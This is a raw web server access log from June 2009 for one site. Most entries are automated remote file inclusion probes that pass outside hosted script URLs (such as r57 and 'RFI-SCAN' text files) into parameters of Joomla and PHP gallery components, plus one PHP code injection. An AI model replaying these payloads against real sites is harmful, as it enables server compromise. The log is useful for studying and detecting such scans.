122.153.28.140 - - [21/Jun/2009:11:40:58 -0700] "GET /logs/access_080330.log%20%20//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:40:59 -0700] "GET /logs//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:41:00 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:07 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:07 -0700] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:41:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:12 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:41:15 -0700] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:41:17 -0700] "GET /?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 20985 "-" "Mozilla/5.0" "www.dmulk.com"
95.211.85.68 - - [21/Jun/2009:11:41:25 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
95.211.85.68 - - [21/Jun/2009:11:41:25 -0700] "GET /logs/access_080906.log//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
95.211.85.68 - - [21/Jun/2009:11:41:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:41:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:41:26 -0700] "GET /logs/access_080313.log//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:41:26 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:27 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:59 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:59 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:59 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:41:59 -0700] "GET /logs/access_080311.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:42:00 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:42:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:42:16 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20912 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:44:06 -0700] "GET /logs/access_081226.log%20%20/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:09 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:09 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:09 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:09 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /logs/access_080131.log%20%20/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /logs/access_080131.log%20%20/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:10 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:11 -0700] "GET /logs/access_080707.log%20%20/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:11 -0700] "GET /logs/access_080707.log%20%20/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
95.211.85.68 - - [21/Jun/2009:11:44:13 -0700] "GET /logs/access_081226.log//tools/send_reminders.php?noSet=0&includedir=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:44:13 -0700] "GET /logs/access_081226.log%20%20/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:20 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:44:21 -0700] "GET /logs/access_080707.log/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:44:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:44:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:44:37 -0700] "GET /logs/access_090405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:44:40 -0700] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:44:46 -0700] "GET /logs/access_080330.log//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:44:46 -0700] "GET /logs//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:44:46 -0700] "GET /?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 20984 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:44:56 -0700] "GET /logs/access_090408.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:45:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:45:18 -0700] "GET /logs/access_090405.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:45:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:45:20 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:45:20 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:45:20 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.223.3.98 - - [21/Jun/2009:11:45:20 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:45:26 -0700] "GET /logs/access_071215.log//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:45:30 -0700] "GET /logs/access_090408.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:45:31 -0700] "GET /logs//?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 105055 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:45:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:45:38 -0700] "GET /logs/access_080311.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:11:45:38 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:45:39 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:45:39 -0700] "GET /logs/access_081023.log//include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:45:40 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:45:44 -0700] "GET /logs/access_081023.log//include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:45:44 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:45:44 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:11:45:46 -0700] "GET /?_zb_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 200 20985 "-" "Mozilla/5.0" "dmulk.com"
95.168.170.105 - - [21/Jun/2009:11:46:01 -0700] "GET /logs//?_zb_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 200 105055 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:46:02 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.43 - - [21/Jun/2009:11:46:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:46:05 -0700] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
95.168.170.105 - - [21/Jun/2009:11:46:16 -0700] "GET /?_zb_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 200 20994 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:11:46:20 -0700] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:47:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:47:19 -0700] "GET /logs/access_090405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:47:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.29.159.130 - - [21/Jun/2009:11:47:19 -0700] "GET /logs//?_zb_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 200 105055 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:11:47:20 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:22 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:22 -0700] "GET /modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:27 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:27 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:32 -0700] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.29.159.130 - - [21/Jun/2009:11:47:36 -0700] "GET /?_zb_path=http://propertiesmalaysia.com.my/ugc_files/test.txt?? HTTP/1.1" 200 20999 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.189.2.38 - - [21/Jun/2009:11:47:37 -0700] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:47:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:47:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:47:43 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:11:47:48 -0700] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:11:47:50 -0700] "GET /logs/access_090408.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.70.83.4 - - [21/Jun/2009:11:47:51 -0700] "GET /logs/access_090222.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://othteam4.t35.com/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.70.83.4 - - [21/Jun/2009:11:47:52 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://othteam4.t35.com/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:48:45 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:48:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:48:48 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:11:48:50 -0700] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.70.83.4 - - [21/Jun/2009:11:48:53 -0700] "GET /logs/access_090222.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://othteam4.t35.com/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [21/Jun/2009:11:48:53 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://othteam4.t35.com/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [21/Jun/2009:11:48:54 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://othteam4.t35.com/RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:56 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:56 -0700] "GET /logs/access_080402.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:56 -0700] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:56 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:49:56 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:11:49:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:57 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:57 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:57 -0700] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:49:57 -0700] "GET /logs/access_080402.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:50:00 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:50:00 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:11:50:00 -0700] "GET /logs/access_080402.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:50:00 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:11:50:00 -0700] "GET /logs/access_080521.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
